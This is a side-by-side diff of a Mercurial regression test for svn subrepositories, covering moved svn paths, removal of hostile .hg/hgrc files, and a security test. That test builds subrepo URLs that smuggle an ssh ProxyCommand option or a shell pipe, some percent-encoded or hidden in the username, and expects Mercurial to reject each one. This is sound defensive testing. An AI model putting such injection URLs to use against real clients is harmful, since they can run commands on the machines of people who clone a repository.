561 notafile*: No such file or directory
561 notafile*: No such file or directory
562 [1]
562 [1]
563 #else
563 #else
564 $ hg forget 'notafile'
564 $ hg forget 'notafile'
565 notafile: * (glob)
565 notafile: * (glob)
566 [1]
566 [1]
567 #endif
567 #endif
568
568
569 Test a subrepo referencing a just moved svn path. Last commit rev will
569 Test a subrepo referencing a just moved svn path. Last commit rev will
570 be different from the revision, and the path will be different as
570 be different from the revision, and the path will be different as
571 well.
571 well.
572
572
573 $ cd "$WCROOT"
573 $ cd "$WCROOT"
574 $ svn up > /dev/null
574 $ svn up > /dev/null
575 $ mkdir trunk/subdir branches
575 $ mkdir trunk/subdir branches
576 $ echo a > trunk/subdir/a
576 $ echo a > trunk/subdir/a
577 $ svn add trunk/subdir branches
577 $ svn add trunk/subdir branches
578 A trunk/subdir (glob)
578 A trunk/subdir (glob)
579 A trunk/subdir/a (glob)
579 A trunk/subdir/a (glob)
580 A branches
580 A branches
581 $ svn ci -qm addsubdir
581 $ svn ci -qm addsubdir
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
583 $ cd ..
583 $ cd ..
584
584
585 $ hg init repo2
585 $ hg init repo2
586 $ cd repo2
586 $ cd repo2
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
588 A subdir/a (glob)
588 A subdir/a (glob)
589 Checked out revision 15.
589 Checked out revision 15.
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
591 $ hg add .hgsub
591 $ hg add .hgsub
592 $ hg ci -m addsub
592 $ hg ci -m addsub
593 $ hg up null
593 $ hg up null
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
595 $ hg up
595 $ hg up
596 A *subdir/a (glob)
596 A *subdir/a (glob)
597 Checked out revision 15.
597 Checked out revision 15.
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
599 $ cd ..
599 $ cd ..
600
600
601 Test sanitizing ".hg/hgrc" in subrepo
601 Test sanitizing ".hg/hgrc" in subrepo
602
602
603 $ cd sub/t
603 $ cd sub/t
604 $ hg update -q -C tip
604 $ hg update -q -C tip
605 $ cd s
605 $ cd s
606 $ mkdir .hg
606 $ mkdir .hg
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
608 $ mkdir -p sub/.hg
608 $ mkdir -p sub/.hg
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
610 $ svn add .hg sub
610 $ svn add .hg sub
611 A .hg
611 A .hg
612 A .hg/hgrc (glob)
612 A .hg/hgrc (glob)
613 A sub
613 A sub
614 A sub/.hg (glob)
614 A sub/.hg (glob)
615 A sub/.hg/hgrc (glob)
615 A sub/.hg/hgrc (glob)
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
617 $ svn up -q
617 $ svn up -q
618 $ cd ..
618 $ cd ..
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
620 $ grep ' s$' .hgsubstate
620 $ grep ' s$' .hgsubstate
621 16 s
621 16 s
622 $ cd ..
622 $ cd ..
623
623
624 $ hg -R tc pull -u -q 2>&1 | sort
624 $ hg -R tc pull -u -q 2>&1 | sort
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
627 $ cd tc
627 $ cd tc
628 $ grep ' s$' .hgsubstate
628 $ grep ' s$' .hgsubstate
629 16 s
629 16 s
630 $ test -f s/.hg/hgrc
630 $ test -f s/.hg/hgrc
631 [1]
631 [1]
632 $ test -f s/sub/.hg/hgrc
632 $ test -f s/sub/.hg/hgrc
633 [1]
633 [1]
634
634
635 Test that sanitizing is omitted in meta data area:
635 Test that sanitizing is omitted in meta data area:
636
636
637 $ mkdir s/.svn/.hg
637 $ mkdir s/.svn/.hg
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
639 $ hg update -q -C '.^1'
639 $ hg update -q -C '.^1'
640
640
641 $ cd ../..
641 $ cd ../..
642
643 SEC: test for ssh exploit
644
645 $ hg init ssh-vuln
646 $ cd ssh-vuln
647 $ echo "s = [svn]$SVNREPOURL/src" >> .hgsub
648 $ svn co --quiet "$SVNREPOURL"/src s
649 $ hg add .hgsub
650 $ hg ci -m1
651 $ echo "s = [svn]svn+ssh://-oProxyCommand=touch%20owned%20nested" > .hgsub
652 $ hg ci -m2
653 $ cd ..
654 $ hg clone ssh-vuln ssh-vuln-clone
655 updating to branch default
656 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepo s)
657 [255]
658
659 also check that a percent encoded '-' (%2D) doesn't work
660
661 $ cd ssh-vuln
662 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20nested" > .hgsub
663 $ hg ci -m3
664 $ cd ..
665 $ rm -r ssh-vuln-clone
666 $ hg clone ssh-vuln ssh-vuln-clone
667 updating to branch default
668 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepo s)
669 [255]
670
671 also check for a pipe
672
673 $ cd ssh-vuln
674 $ echo "s = [svn]svn+ssh://fakehost|sh%20nested" > .hgsub
675 $ hg ci -m3
676 $ cd ..
677 $ rm -r ssh-vuln-clone
678 $ hg clone ssh-vuln ssh-vuln-clone
679 updating to branch default
680 abort: potentially unsafe url: 'svn+ssh://fakehost|sh nested' (in subrepo s)
681 [255]
682
683 also check that a percent encoded '|' (%7C) doesn't work
684
685 $ cd ssh-vuln
686 $ echo "s = [svn]svn+ssh://fakehost%7Csh%20nested" > .hgsub
687 $ hg ci -m3
688 $ cd ..
689 $ rm -r ssh-vuln-clone
690 $ hg clone ssh-vuln ssh-vuln-clone
691 updating to branch default
692 abort: potentially unsafe url: 'svn+ssh://fakehost|sh nested' (in subrepo s)
693 [255]
694
695 also check that hiding the attack in the username doesn't work:
696
697 $ cd ssh-vuln
698 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20foo@example.com/nested" > .hgsub
699 $ hg ci -m3
700 $ cd ..
701 $ rm -r ssh-vuln-clone
702 $ hg clone ssh-vuln ssh-vuln-clone
703 updating to branch default
704 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned foo@example.com/nested' (in subrepo s)
705 [255]
General Comments 0
You need to be logged in to leave comments. Login now